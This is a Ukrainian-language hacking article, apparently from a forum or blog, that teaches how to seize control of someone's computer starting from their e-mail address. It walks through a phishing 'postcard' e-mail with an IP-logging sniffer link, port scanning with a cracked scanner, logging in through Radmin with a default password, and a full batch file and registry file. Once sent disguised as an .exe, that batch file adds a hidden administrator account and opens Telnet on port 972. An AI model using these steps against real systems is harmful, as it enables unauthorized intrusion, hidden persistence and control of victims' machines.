Доброго часу доби.
Немав так часу викласти уроки, але ось вам трошки статті про взлом ПК!
Стаття про те, як отримати повний доступ до чужого комп'ютера, знаючи тільки e-mail.
================================================== == Зміст:
1.) Передмова 2.) Дізнаємося IP 3.) Користуємося різними програмами (аналіз отриманих даних) 4.) Якщо аналіз нічого не дав? 5.) Коротка теорія 6.) Післямова
================================================== == 1.) Передмова.
Для того щоб користуватися цим методом, треба визначитися, чи потрібно це Вам в реальності, або Вам хочеться просто розважити себе і довести, що Ви - найкращий (а). Останнє було для мене стимулом для того, щоб все це проробляти, але тепер я багато чого зрозумів, а головне - зрозумів те, що злом не повинен проводиться, щоб довести оточуючим тебе людям, що ти "кулхацкер". Яким я себе не вважаю. Багато чому треба навчитися, і після практики, якщо все вийшло, на мій погляд, не треба від "нічого робити" зламувати чужі комп'ютери. Отже, сподіваюся з метою всі визначилися, перейдемо до дії?
================================================== == 2.) Дізнаємося IP.
Сподіваюся ні для кого не секрет, що без IP, ми не зможемо знайти потрібний нам комп'ютер, і отже - провести злом. Так як же його дізнатися? (Багато хто задається цим питанням і часто пишуть мені на аську). Дуже просто, нам потребуються прямі руки, трохи фантазії і онлайн сніффер. Багато хто використовує сніффер для відведення cookies (куків, печеньок, сесії - кому як подобається). Але в нашому випадку, cookies нас не цікавлять. Ми йдемо сюди і реєструємося, якщо раніше цього не робили.
http://hacker-pro.net/sniffer/
Відмінно. Півсправи виконано. Тепер йдемо в "настройки", при необхідності завантажуємо своє зображення. І нам дається посилання на сніффер, з перенаправленням на нашу картинку. Не забудьте поставити галочку на "записувати IP в лог". Сподіваюся зрозуміли про що я? Ні?! Тоді читайте. Сенс в тому, щоб дати це посилання своїй "жертві", але тільки з посиланням прихованим під якимсь словом (вивчаємо html), а якщо в лом, то просто берете:
Тут пишіть будь-який текст, або одне слово і створюєте лінк.
Пишіть який-небудь текст (включайте фантазію). Візьмем найпростіше:
=========== Добридень! На Ваш E-mail адресу була відправлена листівка, щоб подивитися її, натисніть сюди ===========
Це було саме легше, раджу придумати щось більш оригінальне. Всю цю муть відправляєте жертві. При бажанні можна використовувати сервіси анонімної відправки пошти, або залити php скрипт, і самому зробити такий сервіс.
Все, залишилося жертві ПЕРЕЙТИ "натисніть сюди", як IP палится в балці. Не треба нічого нікуди вводити, як у випадку з фейком. У результаті всі задоволені, він (вона), отримала свою листівку, а Ви IP.
================================================== == 3.) Користуємося різними прог (аналіз отриманих даних)
Тепер, у нас є головне, без чого була б неможлива подальша робота. Подальші дії - перевірити хост (комп'ютер) на наявність вразливостей - відкритих портів. Я для цих цілей користуюся сканером [XSpider 7.5], Ви можете використовувати будь-який інший, на Ваш смак. Але краще всього використовувати декілька сканерів, що не покаже один - покаже інший.
Відразу качаємо собі [XSpider 7.5] десь з інтернету (н-д, http://depositfiles.com/files/tcdbrurxj). Оновлювати не рекомендую, так як версія крякнути, і повністю робоча.
Тепер коли Ви завантажили його, необхідно його налаштувати - створити новий профіль. Я Вам опишу налаштування.
Відкриваєте сканер >>> Профіль >>> Новий ... >>> Коментар (пишіть що хочете) >>> Йдете на вкладку "Сканер Портів", і внизу
поряд з написом "default.prt" тисніть [...] >>> Вийде віконце, тисніть "новий" >>> Порожній >>> В коментах пишіть що завгодно >>> Внизу побачити "додати порти" і пишіть "4899" і "3389" >>> Зберегти як "4899". >>> Далі виходите назад на вкладки, і знімаєте звідусіль галки.
Точно також створюєте ще 1 профіль, тільки порт 23. Все.
Тепер вбиваєте IP своєї жертви, в полі "додати хост" і починаєте сканувати. Якщо раптом відкритим виявився один з портів 4899 - Radmin, 23 - telnet, 3389 - Remote Desktop (віддалений робочий стіл) - пробуєте Законнектитись (підключитися). Пароль по дефолту 12345678, про це вже писалося. Найкраще (для мене), коли відкритий 4899 порт (Radmin). Підключилися? Радуйтесь! Далі можете робити все що Вашій душі завгодно. Далі читати не обов'язково.
Але, щоб не спалитися, рекомендую Вам прибрати іконку в треї (поряд з годинками), і створити нового користувача, з правами адміністратора.
Remote Desktop входить в стандартну комплектацію Windows. RAdmin Viewer можете завантажити з інтернету (н-д, http://depositfiles.com/files/92m5usz2b). У ньому ж є і telnet P.S. RAdmin теж входить в стандартну комплектацію.
Якщо не вийшло підключитися, не впадаємо в розпач, читаємо далі.
================================================== === 4.) Якщо аналіз нічого не дав?
Якщо він нічого не дав, то можна своїми зусиллями допомогти собі. Робиться це просто, серверна частина встановлюється на віддалений комп'ютер / відкривається потрібний порт з потрібним логіном і паролем. Звичайно, але як встановити / відкрити, якщо комп'ютер далеко???
- А для чого інтернет?? WWW - World Wide Web - Всесвітня павутина. Через інтернет теж можна встановити програму на чужий комп'ютер / або відкрити доступ до вже існуючого. Radmin якщо що, теж іде в стандартній комплектації Windows. А встановити, що це дійсно Windows, можна тим же сканером. Значить - нам залишається тільки відкрити доступ до цього сервісу (23). Про це до нас теж подбали, і написали ось такий *. Txt файл (дивись нижче), який надалі перейменовується в *. Bat. Потім створюється ще один файл, файл конфігурації реєстру, який приховує нового користувача з очей, і його не видно на екрані привітання.
вміст *. bat файлу + + + + chcp 1251 net user SUPPORT_388945a0 / delete net user restot 12345678 / add net localgroup Адміністратори restot / add net localgroup Користувачі SUPPORT_388945a0 / del regedit / s conf.reg sc config tlntsvr start = auto tlntadmn config port = 972 sec =-NTLM net start Telnet + + + +
Цим файлом Ви створюєте нового користувача з ім'ям restot і паролем 12345678 імпортуєте в реєстр налаштування, які приховають Ваше ім'я на екрані привітання. відкриваєте 972 порт, і активуєте Телнет через нього.
Записується без плюсиков в блокнот, потім змінюється розширення на *. Bat
тепер вміст файлу conf.reg + + + + Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserLis t] "Restot" = dword: 00000000 + + + +
В останньому рядку, в лапках, пишіть ім'я, яке вказали в *. Bat файлі. також записуєте в блокнот, а потім міняєте розширення на *. reg
зберігаєте все це в одній папці, можна просто заархівувати обидва файли в один архів, а можна поступити розумніше, скомпілювати файл *. bat в файл *. exe, і також додати в архів помінявши іконку. Після того як жертва запустить батник, можна буде коннектіться до 972 порту, або будь-якого іншого, головне щоб не був зайнятий ...
потім можна встановити те що потрібно через службу Telnet, і більш комфортно управляти віддаленою машиною. ================================================== ======== 5.) Коротка теорія | | |
==================
знаходите жертву >>> дізнаєтеся ip >>> перевіряєте на наявність відкритих портів >>> відкриваєте порти (якщо відкритих не було) >>> встановлюєте через telnet те що потрібно для зручності >>> здійснюєте свій злобний план .. ================================================== ======== 6.) Післямова | | | ================== Стаття писалася пару місяців тому, я написав початок, і зберіг в блокноті, зараз побачив, вирішив дописати і викласти. Кінцівка не повна, але стаття орієнтована для трохи розуміючих юзерів, тому розберетеся. Стаття не є якимось унікальним способом зламати чужий комп'ютер, навіть не знаю, навіщо я її виклав, але тим не менше, якщо вона пройшла модерацію, і ви її зараз читаєте, то знайте, що писалося щоб допомогти вам, читачам.
Конструктивна критика приймається, радий почути думку людей. Всім спасибі за увагу, до нових зустрічей.
Новіші матеріали:
Старіші матеріали:
|